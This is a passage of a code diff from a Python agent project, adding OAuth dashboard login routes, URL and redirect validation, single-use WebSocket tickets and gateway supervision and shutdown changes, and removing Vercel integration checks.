"""Convenience wrapper that reads the header off a Starlette/FastAPI
Request and normalises it. Returns ``""`` when no prefix.
"""
return normalise_prefix(request.headers.get("x-forwarded-prefix"))
# ---------------------------------------------------------------------------
# HERMES_DASHBOARD_PUBLIC_URL / dashboard.public_url
# ---------------------------------------------------------------------------
def _normalise_public_url(raw: Optional[str]) -> str:
"""Normalise a ``dashboard.public_url`` value.
Returns the cleaned URL (scheme://netloc[/path], trailing slash
removed) on success, or ``""`` when the value is empty, malformed,
or contains characters that suggest header injection. The caller
must treat ``""`` as "fall back to request reconstruction" never
as "the user explicitly chose no public URL", because the two are
indistinguishable from an empty env var.
"""
if not raw:
return ""
url = raw.strip()
if not url:
return ""
# Reject control / quote / whitespace characters before trying to
# parse — urlparse is permissive enough to accept some hostile
# values (e.g. embedded newlines) and we want a hard "no" rather
# than a soft "maybe".
if any(c in url for c in _REJECT_CHARS):
return ""
try:
parsed = urllib.parse.urlparse(url)
except ValueError:
return ""
if parsed.scheme not in {"http", "https"}:
return ""
if not parsed.netloc:
return ""
# Strip a single trailing slash so callers can append paths without
# producing ``//`` double-slashes.
return url.rstrip("/")
def _load_dashboard_section() -> dict:
"""Return the ``dashboard`` block from ``config.yaml`` if it exists
and is a dict; otherwise an empty dict.
Robust to (a) load_config() raising (malformed YAML, IO error,
config.yaml absent), and (b) ``dashboard`` being absent or non-dict.
Both shapes fall through to ``{}`` so the caller can rely on
``.get(...)`` access.
"""
try:
from hermes_cli.config import load_config
except Exception:
return {}
try:
cfg = load_config()
except Exception as exc: # noqa: BLE001 — broad catch is intentional
_log.debug(
"dashboard-auth.prefix: load_config() raised %s; "
"falling back to env-only configuration",
exc,
)
return {}
section = cfg.get("dashboard") if isinstance(cfg, dict) else None
return section if isinstance(section, dict) else {}
def resolve_public_url() -> str:
"""Resolve the operator-declared dashboard public URL.
Precedence (mirrors ``dashboard.oauth.client_id``):
1. ``HERMES_DASHBOARD_PUBLIC_URL`` env var (when non-empty after
strip empty values are treated as unset so a provisioned-but-
not-populated Fly secret can't shadow a valid config.yaml entry).
2. ``dashboard.public_url`` in ``config.yaml``.
3. Empty string signals "no override, reconstruct from request"
to the caller.
Each candidate value is run through :func:`_normalise_public_url`.
A malformed env var falls through to the config.yaml entry; a
malformed config entry falls through to ``""``. This means a typo
in one surface doesn't prevent the other from working.
"""
env_raw = os.environ.get("HERMES_DASHBOARD_PUBLIC_URL", "")
env_clean = _normalise_public_url(env_raw)
if env_clean:
return env_clean
cfg_raw = _load_dashboard_section().get("public_url", "")
return _normalise_public_url(str(cfg_raw))
+58
View File
@@ -0,0 +1,58 @@
"""Module-level registry for DashboardAuthProvider instances.
Plugins call ``register_provider`` via the plugin context hook at startup.
The auth gate middleware iterates ``list_providers()`` and uses
``get_provider`` to dispatch on the session's ``provider`` field.
"""
from __future__ import annotations
import logging
import threading
from typing import List, Optional
from hermes_cli.dashboard_auth.base import (
DashboardAuthProvider,
assert_protocol_compliance,
)
_log = logging.getLogger(__name__)
_lock = threading.Lock()
_providers: dict[str, DashboardAuthProvider] = {}
def register_provider(provider: DashboardAuthProvider) -> None:
"""Register a provider.
Raises:
TypeError: on protocol violation.
ValueError: if a provider with the same name is already registered.
"""
assert_protocol_compliance(type(provider))
with _lock:
if provider.name in _providers:
raise ValueError(
f"dashboard-auth provider already registered: {provider.name!r}"
)
_providers[provider.name] = provider
_log.info(
"dashboard-auth: registered provider %r (%s)",
provider.name, provider.display_name,
)
def get_provider(name: str) -> Optional[DashboardAuthProvider]:
"""Return the registered provider for ``name``, or None if unknown."""
with _lock:
return _providers.get(name)
def list_providers() -> List[DashboardAuthProvider]:
"""All registered providers, in registration order."""
with _lock:
return list(_providers.values())
def clear_providers() -> None:
"""Test-only: drop all registrations."""
with _lock:
_providers.clear()
+456
View File
@@ -0,0 +1,456 @@
"""HTTP routes for the dashboard-auth OAuth round trip.
Mounted at root (no prefix) by ``web_server.py``. The router does not
auto-gate; gating is performed by ``gated_auth_middleware``, which
allowlists everything under ``/auth/*`` and ``/api/auth/providers``.
The routes:
GET /login server-rendered login page
GET /auth/login?provider=N 302 to IDP, sets PKCE cookie
GET /auth/callback?code,state completes login, sets session cookies
POST /auth/logout clears cookies, best-effort revoke
GET /api/auth/providers list registered providers (login bootstrap)
GET /api/auth/me current Session as JSON (auth-required)
"""
from __future__ import annotations
import logging
import time
from typing import Any
from fastapi import APIRouter, HTTPException, Request
from fastapi.responses import HTMLResponse, JSONResponse, RedirectResponse
from hermes_cli.dashboard_auth import (
get_provider,
list_providers,
)
from hermes_cli.dashboard_auth.audit import AuditEvent, audit_log
from hermes_cli.dashboard_auth.base import (
InvalidCodeError,
ProviderError,
)
from hermes_cli.dashboard_auth.cookies import (
clear_pkce_cookie,
clear_session_cookies,
detect_https,
read_pkce_cookie,
read_session_cookies,
set_pkce_cookie,
set_session_cookies,
)
from hermes_cli.dashboard_auth.login_page import render_login_html
_log = logging.getLogger(__name__)
router = APIRouter()
def _redirect_uri(request: Request) -> str:
"""Reconstruct the absolute callback URL the IDP redirects back to.
Three resolution tiers:
1. ``HERMES_DASHBOARD_PUBLIC_URL`` env var or
``dashboard.public_url`` in config.yaml when set, this is
the complete authority (scheme + host + optional path prefix)
and we append ``/auth/callback`` verbatim. ``X-Forwarded-Prefix``
is IGNORED on this code path because the operator has declared
the public URL we no longer need to guess from proxy headers,
and stacking the prefix on top would double-prefix the common
case where the prefix is already baked into ``public_url``.
Relief valve for deploys behind reverse proxies whose forwarded
headers aren't reliable.
2. ``X-Forwarded-Prefix: /hermes`` (Mission Control deploys) we
prepend the prefix to the path FastAPI's ``url_for`` produces
(it doesn't natively honour this header — it isn't part of the
Starlette/uvicorn proxy_headers set).
3. Bare ``request.url_for("auth_callback")`` under uvicorn's
``proxy_headers=True`` this picks up the public https URL from
``X-Forwarded-Host`` plus ``X-Forwarded-Proto``. Fly.io's
default path.
"""
from urllib.parse import urlparse, urlunparse
from hermes_cli.dashboard_auth.prefix import (
prefix_from_request,
resolve_public_url,
)
# Tier 1: operator-declared public URL.
public_url = resolve_public_url()
if public_url:
# ``public_url`` is the complete authority (possibly with a
# path prefix already baked in). Append the auth callback path
# verbatim. ``resolve_public_url`` already stripped any trailing
# slash so we don't produce ``//auth/callback`` double-slashes.
return f"{public_url}/auth/callback"
# Tier 2 + 3: reconstruct from the request URL, optionally with
# X-Forwarded-Prefix layered on top of the path.
base = str(request.url_for("auth_callback"))
prefix = prefix_from_request(request)
if not prefix:
return base
parsed = urlparse(base)
return urlunparse(parsed._replace(path=f"{prefix}{parsed.path}"))
def _client_ip(request: Request) -> str:
fwd = request.headers.get("x-forwarded-for", "")
if fwd:
return fwd.split(",")[0].strip()
return request.client.host if request.client else ""
def _prefix(request: Request) -> str:
"""Resolve the X-Forwarded-Prefix header for the active request.
Local indirection so the routes pass a consistent value to the
cookie helpers (cookie name + Path attribute) and the gate's
redirect builders (login_url construction). See
``hermes_cli.dashboard_auth.prefix`` for the normalisation rules.
"""
from hermes_cli.dashboard_auth.prefix import prefix_from_request
return prefix_from_request(request)
# ---------------------------------------------------------------------------
# Public: login page (server-rendered HTML, no SPA bundle)
# ---------------------------------------------------------------------------
@router.get("/login", name="login_page")
async def login_page(request: Request) -> HTMLResponse:
# Read the ``next=`` query the gate's ``_unauth_response`` set on
# the redirect URL. Validate against the same same-origin rules the
# callback applies (defence in depth — the gate already filters,
# but /login is reachable directly too).
next_path = _validate_post_login_target(
request.query_params.get("next", "")
)
return HTMLResponse(
render_login_html(next_path=next_path),
headers={"Cache-Control": "no-store, no-cache, must-revalidate"},
)
# ---------------------------------------------------------------------------
# Public: provider list for the login-page bootstrap
# ---------------------------------------------------------------------------
@router.get("/api/auth/providers", name="auth_providers")
async def api_auth_providers() -> Any:
providers = list_providers()
if not providers:
# Q13: fail-closed when zero providers are registered.
return JSONResponse(
{"detail": "no auth providers registered"},
status_code=503,
)
return {
"providers": [
{"name": p.name, "display_name": p.display_name}
for p in providers
],
}
# ---------------------------------------------------------------------------
# Public: OAuth round trip
# ---------------------------------------------------------------------------
@router.get("/auth/login", name="auth_login")
async def auth_login(request: Request, provider: str, next: str = ""):
p = get_provider(provider)
if p is None:
raise HTTPException(
status_code=404,
detail=f"Unknown provider: {provider!r}",
)
try:
ls = p.start_login(redirect_uri=_redirect_uri(request))
except ProviderError as e:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider,
reason="provider_unreachable",
ip=_client_ip(request),
)
raise HTTPException(
status_code=503,
detail=f"Provider unreachable: {e}",
)
audit_log(
AuditEvent.LOGIN_START,
provider=provider,
ip=_client_ip(request),
)
resp = RedirectResponse(url=ls.redirect_url, status_code=302)
# Pack the provider name into the PKCE cookie so the callback can
# find it without a separate cookie. Provider may or may not have
# already included a ``provider=`` segment.
pkce = ls.cookie_payload.get("hermes_session_pkce", "")
if "provider=" not in pkce:
pkce = f"provider={provider};{pkce}" if pkce else f"provider={provider}"
# Carry ``next=`` through the round trip in the PKCE cookie. Real
# IDPs only echo back ``code`` + ``state`` on the callback URL, so
# query-string transport would lose the value — the cookie is the
# only server-controlled channel that survives. Validate before we
# store it so an attacker who reaches /auth/login directly with
# ``next=//evil.example`` can't poison the cookie.
safe_next = _validate_post_login_target(next)
if safe_next:
from urllib.parse import quote
pkce = f"{pkce};next={quote(safe_next, safe='')}"
set_pkce_cookie(
resp, payload=pkce, use_https=detect_https(request),
prefix=_prefix(request),
)
return resp
@router.get("/auth/callback", name="auth_callback")
async def auth_callback(
request: Request,
code: str = "",
state: str = "",
error: str = "",
error_description: str = "",
):
pkce_raw = read_pkce_cookie(request)
if not pkce_raw:
audit_log(
AuditEvent.LOGIN_FAILURE,
reason="missing_pkce_cookie",
ip=_client_ip(request),
)
raise HTTPException(
status_code=400,
detail="Missing PKCE state cookie",
)
# Parse ``provider=...;state=...;verifier=...;next=...`` — the
# ``next`` segment is optional (only present when /auth/login was
# given a next= query). All keys live in the same flat namespace;
# ``next`` carries a URL-encoded path so it never contains ``;``.
parts = dict(
seg.split("=", 1) for seg in pkce_raw.split(";") if "=" in seg
)
provider_name = parts.get("provider", "")
expected_state = parts.get("state", "")
verifier = parts.get("verifier", "")
# Read next= from the cookie ONLY. The IDP doesn't echo next= back
# on the callback URL (it only carries ``code`` + ``state``), so any
# next= query parameter on the callback URL is attacker-controlled
# and MUST be ignored.
next_from_cookie = parts.get("next", "")
p = get_provider(provider_name)
if p is None:
raise HTTPException(
status_code=400,
detail=f"Unknown provider in cookie: {provider_name!r}",
)
if error:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="idp_error",
error=error,
ip=_client_ip(request),
)
raise HTTPException(
status_code=400,
detail=f"OAuth error from provider: {error} ({error_description})",
)
if not state or state != expected_state:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="state_mismatch",
ip=_client_ip(request),
)
raise HTTPException(
status_code=400,
detail="OAuth state mismatch (CSRF check failed)",
)
try:
session = p.complete_login(
code=code,
state=state,
code_verifier=verifier,
redirect_uri=_redirect_uri(request),
)
except InvalidCodeError as e:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="invalid_code",
ip=_client_ip(request),
)
raise HTTPException(status_code=400, detail=f"Invalid code: {e}")
except ProviderError as e:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="provider_unreachable",
ip=_client_ip(request),
)
raise HTTPException(
status_code=503,
detail=f"Provider unreachable: {e}",
)
audit_log(
AuditEvent.LOGIN_SUCCESS,
provider=provider_name,
user_id=session.user_id,
email=session.email,
org_id=session.org_id,
ip=_client_ip(request),
)
expires_in = max(60, session.expires_at - int(time.time()))
# Honour the ``next=`` value the gate's _unauth_response set in the
# /login redirect URL and that /auth/login persisted into the PKCE
# cookie. We re-validate against the same-origin rules here — the
# cookie is server-set so this is defence in depth, but a regression
# that lets attacker-controlled bytes into the cookie would otherwise
# produce an open redirect.
landing = _validate_post_login_target(next_from_cookie) or "/"
resp = RedirectResponse(url=landing, status_code=302)
set_session_cookies(
resp,
access_token=session.access_token,
refresh_token=session.refresh_token,
access_token_expires_in=expires_in,
use_https=detect_https(request),
prefix=_prefix(request),
)
clear_pkce_cookie(resp, prefix=_prefix(request))
return resp
def _validate_post_login_target(raw: str) -> str:
"""Return ``raw`` if it's a safe same-origin path, else empty string.
The ``next`` query param survives a full OAuth round trip the gate
encodes it into the /login redirect, the login page emits it back into
/auth/login, and the IDP preserves it across /authorize/callback. We
have to re-validate here because the value came back in via the
URL (an attacker could craft a /auth/callback URL with their own
``next=https://evil.example``).
"""
if not raw:
return ""
from urllib.parse import unquote
decoded = unquote(raw)
if not decoded.startswith("/") or decoded.startswith("//"):
return ""
# Don't loop back to login pages or auth flow.
if any(
decoded == p or decoded.startswith(p)
for p in ("/login", "/auth/", "/api/auth/")
):
return ""
return decoded
@router.post("/auth/logout", name="auth_logout")
async def auth_logout(request: Request):
_at, rt = read_session_cookies(request)
if rt:
# Best-effort revoke. Try every provider so a session minted by
# any registered provider is revoked correctly. Failures are
# logged but never raised.
for provider in list_providers():
try:
provider.revoke_session(refresh_token=rt)
except Exception as e: # noqa: BLE001 — best-effort
_log.warning(
"dashboard-auth: revoke on %r failed: %s",
provider.name, e,
)
sess = getattr(request.state, "session", None)
audit_log(
AuditEvent.LOGOUT,
provider=(sess.provider if sess else "unknown"),
user_id=(sess.user_id if sess else ""),
ip=_client_ip(request),
)
prefix = _prefix(request)
resp = RedirectResponse(url=f"{prefix}/login", status_code=302)
clear_session_cookies(resp, prefix=prefix)
clear_pkce_cookie(resp, prefix=prefix)
return resp
# ---------------------------------------------------------------------------
# Auth-required: identity probe for the SPA
# ---------------------------------------------------------------------------
@router.get("/api/auth/me", name="auth_me")
async def api_auth_me(request: Request):
"""Return the verified session as JSON. Auth-required (gate enforces)."""
sess = getattr(request.state, "session", None)
if sess is None:
raise HTTPException(status_code=401, detail="Unauthorized")
return {
"user_id": sess.user_id,
"email": sess.email,
"display_name": sess.display_name,
"org_id": sess.org_id,
"provider": sess.provider,
"expires_at": sess.expires_at,
}
# ---------------------------------------------------------------------------
# Auth-required: WS upgrade ticket (Phase 5)
# ---------------------------------------------------------------------------
@router.post("/api/auth/ws-ticket", name="auth_ws_ticket")
async def api_auth_ws_ticket(request: Request):
"""Mint a short-lived single-use ticket for the authenticated session.
Browsers cannot set ``Authorization`` on a WebSocket upgrade, so in
gated mode the SPA POSTs this endpoint to get a ``?ticket=`` value to
append to ``/api/pty``, ``/api/ws``, ``/api/pub``, or ``/api/events``.
The ticket has a 30-second TTL and is single-use. Calling this endpoint
multiple times in quick succession (e.g. one ticket per WS) is the
expected pattern.
"""
sess = getattr(request.state, "session", None)
if sess is None:
# Middleware should already have rejected, but check defensively.
raise HTTPException(status_code=401, detail="Unauthorized")
# Import here so the routes module stays usable in test contexts that
# don't load the ticket store.
from hermes_cli.dashboard_auth.ws_tickets import TTL_SECONDS, mint_ticket
ticket = mint_ticket(user_id=sess.user_id, provider=sess.provider)
audit_log(
AuditEvent.WS_TICKET_MINTED,
provider=sess.provider,
user_id=sess.user_id,
ip=_client_ip(request),
)
return {"ticket": ticket, "ttl_seconds": TTL_SECONDS}
+87
View File
@@ -0,0 +1,87 @@
"""Short-lived single-use tickets for WS-upgrade auth in gated mode.
Browsers cannot set ``Authorization`` on a WebSocket upgrade. In loopback
mode the legacy ``?token=<_SESSION_TOKEN>`` query param works because the
token is injected into the SPA bundle. In gated mode there is no injected
token the SPA gets a fresh ticket via the authenticated REST endpoint
``POST /api/auth/ws-ticket`` and passes that as ``?ticket=`` on the
WS upgrade.
Tickets are single-use, TTL = 30 seconds. In-memory; the dashboard is a
single process so no distributed coordination is needed. The module
exposes a small functional API rather than a class so tests can patch
``time.time`` cleanly.
"""
from __future__ import annotations
import secrets
import threading
import time
from typing import Any, Dict, Tuple
#: Time-to-live for newly-minted tickets in seconds. 30 s is long enough
#: that the SPA can call ``getWsTicket()`` and immediately open the WS,
#: short enough that a leaked ticket is uninteresting.
TTL_SECONDS = 30
_lock = threading.Lock()
_tickets: Dict[str, Tuple[int, Dict[str, Any]]] = {} # ticket -> (expires_at, info)
class TicketInvalid(Exception):
"""Ticket missing, expired, or already consumed."""
def mint_ticket(*, user_id: str, provider: str) -> str:
"""Generate a one-shot ticket bound to this user identity.
The returned token is base64url, 43 bytes of entropy (32-byte random
seed). Stash returns the ``info`` dict to the caller on consume so the
WS handler can carry the identity forward into its session log.
"""
ticket = secrets.token_urlsafe(32)
info = {
"user_id": user_id,
"provider": provider,
"minted_at": int(time.time()),
}
with _lock:
_tickets[ticket] = (int(time.time()) + TTL_SECONDS, info)
_gc_expired_locked()
return ticket
def consume_ticket(ticket: str) -> Dict[str, Any]:
"""Validate and consume. Raises :class:`TicketInvalid` on missing/expired/used.
Single-use semantics: a successful consume immediately removes the
ticket from the store, so a second call with the same value raises
``TicketInvalid("unknown ticket: …")``.
"""
now = int(time.time())
with _lock:
entry = _tickets.pop(ticket, None)
if entry is None:
# Truncate ticket value in the error so misuse never logs the
# secret in full.
truncated = (ticket[:8] + "") if ticket else "<empty>"
raise TicketInvalid(f"unknown ticket: {truncated}")
expires_at, info = entry
if expires_at < now:
raise TicketInvalid("expired")
return info
def _gc_expired_locked() -> None:
"""Drop expired tickets. Caller must hold ``_lock``."""
now = int(time.time())
expired = [t for t, (exp, _) in _tickets.items() if exp < now]
for t in expired:
_tickets.pop(t, None)
def _reset_for_tests() -> None:
"""Test-only: drop all tickets."""
with _lock:
_tickets.clear()
+1 -67
View File
@@ -25,7 +25,6 @@ load_hermes_dotenv(hermes_home=_env_path.parent, project_env=PROJECT_ROOT / ".en
from hermes_cli.colors import Colors, color
from hermes_cli.models import _HERMES_USER_AGENT
from hermes_cli.vercel_auth import describe_vercel_auth
from hermes_constants import OPENROUTER_MODELS_URL
from utils import base_url_host_matches
@@ -49,7 +48,6 @@ _PROVIDER_ENV_HINTS = (
"DEEPSEEK_API_KEY",
"DASHSCOPE_API_KEY",
"HF_TOKEN",
"AI_GATEWAY_API_KEY",
"OPENCODE_ZEN_API_KEY",
"OPENCODE_GO_API_KEY",
"XIAOMI_API_KEY",
@@ -324,7 +322,6 @@ def _build_apikey_providers_list() -> list:
("MiniMax", ("MINIMAX_API_KEY",), "https://api.minimax.io/v1/models", "MINIMAX_BASE_URL", True),
# MiniMax CN: /v1 endpoint does NOT support /models (returns 404).
("MiniMax (China)", ("MINIMAX_CN_API_KEY",), "https://api.minimaxi.com/v1/models", "MINIMAX_CN_BASE_URL", False),
("Vercel AI Gateway", ("AI_GATEWAY_API_KEY",), "https://ai-gateway.vercel.sh/v1/models", "AI_GATEWAY_BASE_URL", True),
("Kilo Code", ("KILOCODE_API_KEY",), "https://api.kilo.ai/api/gateway/models", "KILOCODE_BASE_URL", True),
("OpenCode Zen", ("OPENCODE_ZEN_API_KEY",), "https://opencode.ai/zen/v1/models", "OPENCODE_ZEN_BASE_URL", True),
# OpenCode Go has no shared /models endpoint; skip the health check.
@@ -340,7 +337,7 @@ def _build_apikey_providers_list() -> list:
"Arcee AI": "arcee", "GMI Cloud": "gmi", "DeepSeek": "deepseek",
"Hugging Face": "huggingface", "NVIDIA NIM": "nvidia",
"Alibaba/DashScope": "alibaba", "MiniMax": "minimax",
"MiniMax (China)": "minimax-cn", "Vercel AI Gateway": "ai-gateway",
"MiniMax (China)": "minimax-cn",
"Kilo Code": "kilocode", "OpenCode Zen": "opencode-zen",
"OpenCode Go": "opencode-go",
}
@@ -690,7 +687,6 @@ def run_doctor(args):
"openrouter",
"custom",
"auto",
"ai-gateway",
"kilocode",
"opencode-zen",
"huggingface",
@@ -1262,68 +1258,6 @@ def run_doctor(args):
issues,
)
# Vercel Sandbox (if using vercel_sandbox backend)
if terminal_env == "vercel_sandbox":
runtime = os.getenv("TERMINAL_VERCEL_RUNTIME", "node24").strip() or "node24"
from tools.terminal_tool import _SUPPORTED_VERCEL_RUNTIMES
if runtime in _SUPPORTED_VERCEL_RUNTIMES:
check_ok("Vercel runtime", f"({runtime})")
else:
supported = ", ".join(_SUPPORTED_VERCEL_RUNTIMES)
_fail_and_issue(
"Vercel runtime unsupported",
f"({runtime}; use {supported})",
f"Set TERMINAL_VERCEL_RUNTIME to one of: {supported}",
issues,
)
disk = os.getenv("TERMINAL_CONTAINER_DISK", "51200").strip()
if disk in {"", "0", "51200"}:
check_ok("Vercel disk setting", "(uses platform default)")
else:
_fail_and_issue(
"Vercel custom disk unsupported",
"(reset terminal.container_disk to 51200)",
"Vercel Sandbox does not support custom container_disk; use the shared default 51200",
issues,
)
if importlib.util.find_spec("vercel") is not None:
check_ok("vercel SDK", "(installed)")
else:
_fail_and_issue(
"vercel SDK not installed",
"(pip install 'hermes-agent[vercel]')",
"Install the Vercel optional dependency: pip install 'hermes-agent[vercel]'",
issues,
)
auth_status = describe_vercel_auth()
if auth_status.ok:
check_ok("Vercel auth", f"({auth_status.label})")
elif auth_status.label.startswith("partial"):
_fail_and_issue(
"Vercel auth incomplete",
f"({auth_status.label})",
"Set VERCEL_TOKEN, VERCEL_PROJECT_ID, and VERCEL_TEAM_ID together",
issues,
)
else:
_fail_and_issue(
"Vercel auth not configured",
f"({auth_status.label})",
"Configure Vercel Sandbox auth with VERCEL_TOKEN, VERCEL_PROJECT_ID, and VERCEL_TEAM_ID",
issues,
)
for line in auth_status.detail_lines:
check_info(f"Vercel auth {line}")
persistent = os.getenv("TERMINAL_CONTAINER_PERSISTENT", "true").lower() in {"1", "true", "yes", "on"}
if persistent:
check_info("Vercel persistence: snapshot filesystem only; live processes do not survive sandbox recreation")
else:
check_info("Vercel persistence: ephemeral filesystem")
# Node.js + agent-browser (for browser automation tools)
if _safe_which("node"):
check_ok("Node.js")
+24 -3
View File
@@ -20,7 +20,15 @@ from agent.skill_utils import is_excluded_skill_path
def _get_git_commit(project_root: Path) -> str:
"""Return short git commit hash, or '(unknown)'."""
"""Return short git commit hash, or '(unknown)'.
Source installs and dev images resolve this live via ``git rev-parse``.
The published Docker image excludes ``.git`` from the build context, so
that lookup always fails we fall back to the baked-in build SHA written
to ``<project_root>/.hermes_build_sha`` by the Dockerfile's
``HERMES_GIT_SHA`` build-arg (see ``hermes_cli/build_info.py``).
The output format is identical regardless of source.
"""
try:
result = subprocess.run(
["git", "rev-parse", "--short=8", "HEAD"],
@@ -28,9 +36,23 @@ def _get_git_commit(project_root: Path) -> str:
cwd=str(project_root),
)
if result.returncode == 0:
return result.stdout.strip()
value = result.stdout.strip()
if value:
return value
except Exception:
pass
# Fall back to the build-time baked SHA (populated in published Docker
# images, absent otherwise). Defers the import so the dump module
# stays cheap on non-dump code paths.
try:
from hermes_cli.build_info import get_build_sha
baked = get_build_sha(short=8)
if baked:
return baked
except Exception:
pass
return "(unknown)"
@@ -279,7 +301,6 @@ def run_dump(args):
("DASHSCOPE_API_KEY", "dashscope"),
("HF_TOKEN", "huggingface"),
("NVIDIA_API_KEY", "nvidia"),
("AI_GATEWAY_API_KEY", "ai_gateway"),
("OPENCODE_ZEN_API_KEY", "opencode_zen"),
("OPENCODE_GO_API_KEY", "opencode_go"),
("KILOCODE_API_KEY", "kilocode"),
+72
View File
@@ -5150,11 +5150,83 @@ def gateway_command(args):
sys.exit(1)
def _maybe_redirect_run_to_s6_supervision(args) -> bool:
"""Inside an s6 container, redirect bare ``gateway run`` to the
supervised path.
Background. Before the s6 image landed, ``docker run <image> gateway
run`` was the standard way to start a containerized gateway: the
gateway was the container's main process, tini reaped zombies, and
container exit code == gateway exit code. With s6-overlay as PID 1,
we'd much rather have the gateway run as a supervised s6 longrun
(auto-restart on crash, dashboard supervised alongside, multiple
profile gateways under the same /init). This redirect upgrades the
old invocation transparently the user gets the new behavior
without changing their docker run command.
Three gates make this a no-op outside the intended scope:
1. ``_dispatch_via_service_manager_if_s6`` returns False unless
we're in a container with s6 as PID 1. Host runs of
``hermes gateway run`` are unaffected.
2. ``HERMES_S6_SUPERVISED_CHILD`` is exported by
``S6ServiceManager._render_run_script`` for the supervised
process itself i.e. when s6-supervise execs ``hermes gateway
run --replace`` as a longrun, this guard short-circuits the
redirect so the supervised gateway actually runs in
foreground (otherwise we'd recurse: run → start → run → start
...).
3. ``--no-supervise`` (or ``HERMES_GATEWAY_NO_SUPERVISE=1``) opts
out for users who genuinely want pre-s6 semantics CI smoke
tests, debugging the foreground startup path, etc.
Returns True iff dispatched (caller should ``return``).
"""
no_supervise = getattr(args, "no_supervise", False) or \
os.environ.get("HERMES_GATEWAY_NO_SUPERVISE", "").lower() in ("1", "true", "yes")
if no_supervise:
return False
if os.environ.get("HERMES_S6_SUPERVISED_CHILD"):
# We ARE the supervised child s6-supervise is running. Fall
# through to the foreground code path so the gateway actually
# starts.
return False
if not _dispatch_via_service_manager_if_s6("start"):
return False
# Loud breadcrumb: explain the upgrade and how to opt out. Print to
# stderr so it doesn't pollute stdout-parsing scripts. The
# supervised gateway's own logs are routed by s6-log to both
# `docker logs` and ${HERMES_HOME}/logs/gateways/<profile>/current,
# so the user sees a clear sequence: this banner first, then the
# gateway's own stdout/stderr from the supervisor.
print(
"→ gateway is now running under s6 supervision (auto-restart on crash,\n"
" dashboard supervised alongside if HERMES_DASHBOARD is set).\n"
" This is the recommended setup for the s6 container image — the\n"
" gateway will keep running even if it crashes.\n"
" Use `--no-supervise` (or HERMES_GATEWAY_NO_SUPERVISE=1) to opt out\n"
" and get the pre-s6 foreground behavior instead.",
file=sys.stderr,
flush=True,
)
# Block until the container is signalled. The supervised gateway's
# lifetime is independent of this process — s6-supervise restarts
# it on crash, and we don't want the container to exit when the
# gateway flaps. `sleep infinity` matches the static main-hermes
# service's pattern (see docker/s6-rc.d/main-hermes/run): the CMD
# process is a no-op heartbeat that keeps /init alive until
# `docker stop` sends SIGTERM, at which point /init runs stage 3
# shutdown (which tears down the supervised gateway cleanly).
os.execvp("sleep", ["sleep", "infinity"])
def _gateway_command_inner(args):
subcmd = getattr(args, 'gateway_command', None)
# Default to run if no subcommand
if subcmd is None or subcmd == "run":
if _maybe_redirect_run_to_s6_supervision(args):
return # unreachable; execvp doesn't return
verbose = getattr(args, 'verbose', 0)
quiet = getattr(args, 'quiet', False)
replace = getattr(args, 'replace', False)
+72 -7
View File
@@ -1014,12 +1014,70 @@ def start() -> None:
_report_gateway_start(f"direct spawn (PID {pid})")
def stop() -> None:
"""Stop the gateway. Tries /End on the scheduled task, then kills any stragglers."""
_assert_windows()
from hermes_cli.gateway import kill_gateway_processes
def _drain_gateway_pid(pid: int, drain_timeout: float) -> bool:
"""Write the planned-stop marker and wait for the gateway PID to exit.
stopped_any = False
Windows cannot deliver POSIX signals to a Python asyncio loop
(``loop.add_signal_handler`` raises NotImplementedError), so writing
the marker is the ONLY way to ask a running gateway to drain
in-flight agents and persist ``resume_pending`` before exit. The
gateway's planned-stop watcher thread (gateway/run.py) polls for
the marker and drives the same shutdown path the SIGTERM handler
would have on POSIX.
Returns True if the PID exited within the timeout, False if it
didn't (caller should escalate to schtasks /End + taskkill).
"""
if pid <= 0:
return False
try:
from gateway.status import write_planned_stop_marker, _pid_exists
except ImportError:
return False
try:
write_planned_stop_marker(pid)
except Exception:
# Best-effort: if the marker can't be written, we have no choice
# but to fall through to a hard kill. Caller decides escalation.
pass
deadline = time.monotonic() + max(drain_timeout, 1.0)
while time.monotonic() < deadline:
if not _pid_exists(pid):
return True
time.sleep(0.5)
return False
def stop() -> None:
"""Stop the gateway.
Writes the planned-stop marker first so the gateway can drain
in-flight agents and persist ``resume_pending`` before exit (the
gateway's marker-watcher thread picks this up — Windows asyncio
can't deliver SIGTERM to the loop, so the marker is our only IPC).
Then escalates: ``schtasks /End`` (kills the scheduled-task tree)
+ ``kill_gateway_processes(force=True)`` for any strays.
"""
_assert_windows()
from hermes_cli.gateway import kill_gateway_processes, _get_restart_drain_timeout
from gateway.status import get_running_pid
# Phase 1: ask the running gateway (if any) to drain itself by writing
# the planned-stop marker, then wait briefly for it to exit cleanly.
# On clean exit, sessions land with resume_pending=True and the next
# boot will auto-resume them.
pid = get_running_pid()
drained = False
if pid is not None:
try:
drain_timeout = float(_get_restart_drain_timeout() or 30.0)
except Exception:
drain_timeout = 30.0
drained = _drain_gateway_pid(pid, drain_timeout)
stopped_any = drained
if is_task_registered():
code, _out, err = _exec_schtasks(["/End", "/TN", get_task_name()])
# schtasks returns nonzero when the task isn't currently running — don't treat that as an error.
@@ -1028,12 +1086,19 @@ def stop() -> None:
elif "not running" not in (err or "").lower():
print(f"⚠ schtasks /End returned code {code}: {err.strip()}")
killed = kill_gateway_processes(all_profiles=False)
# Phase 3: hard-kill any strays. When drain succeeded this is a no-op;
# when drain timed out this is the escalation that ensures the PID
# actually exits. Use force=True on Windows so taskkill /T /F walks
# the descendant tree (browser helpers, etc.).
killed = kill_gateway_processes(all_profiles=False, force=not drained)
if killed:
stopped_any = True
print(f"✓ Killed {killed} gateway process(es)")
if stopped_any:
print("✓ Gateway stopped")
if drained:
print("✓ Gateway stopped (drained cleanly)")
else:
print("✓ Gateway stopped")
else:
print("✗ No gateway was running")
+73 -35
View File
@@ -1021,7 +1021,7 @@ def _board_task_counts(slug: str) -> dict[str, int]:
path = kb.kanban_db_path(board=slug)
if not path.exists():
return {}
with kb.connect(board=slug) as conn:
with kb.connect_closing(board=slug) as conn:
rows = conn.execute(
"SELECT status, COUNT(*) AS n FROM tasks GROUP BY status"
).fetchall()
@@ -1264,7 +1264,7 @@ def _cmd_init(args: argparse.Namespace) -> int:
def _cmd_heartbeat(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.heartbeat_worker(
conn,
args.task_id,
